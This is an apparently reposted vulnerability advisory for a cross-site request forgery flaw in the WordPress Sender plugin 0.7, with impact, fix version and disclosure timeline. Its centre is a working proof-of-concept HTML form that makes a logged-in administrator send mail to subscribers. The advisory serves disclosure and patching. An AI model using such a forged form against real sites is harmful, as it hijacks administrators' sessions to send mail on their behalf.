WordPress Sender 0.7 Cross Site Request Forgery
Posted on 17 December 2015
Plugin Name : Sender A8-Cross-Site_Request_Forgery_(CSRF) Effected Version : 0.7 (and most probably lower version's if any) Vulnerability : A8-Cross-Site Request Forgery (CSRF) Identified by : Madhu Akula Technical Details Minimum Level of Access Required : Unauthenticated PoC - (Proof of Concept) : POC for Sending mail : <html> <body> <form action=”http://localhost/wp-admin/admin.php?page=sndr_send_user” method=”POST”> <input type=”hidden” name=”sndr_user_name[subscriber]” value=”1″ /> <input type=”hidden” name=”sndr_subject” value=”test” /> <input type=”hidden” name=”sndr_content” value=”test” /> <input type=”submit” value=”Submit request” /> </form> </body> </html> Impact : we can send mail to any one on behalf of the admin Fixed in : 0.8 http://wordpress.org/plugins/sender/changelog/ Disclosure Timeline Vendor Contacted : 2014-08-04 Plugin Status : Updated on 2014-08-07 Public Disclosure : October 3, 2015 CVE Number : Not assigned yet Plugin Description : This plugin allows you send mails to all users or to certain categories of users via several clicks. To send letters, you can use the php functions such as sending emails, wordpress functions, or send an email through the SMTP server. Also, the plugin provides a bulk mailing for a certain period of time.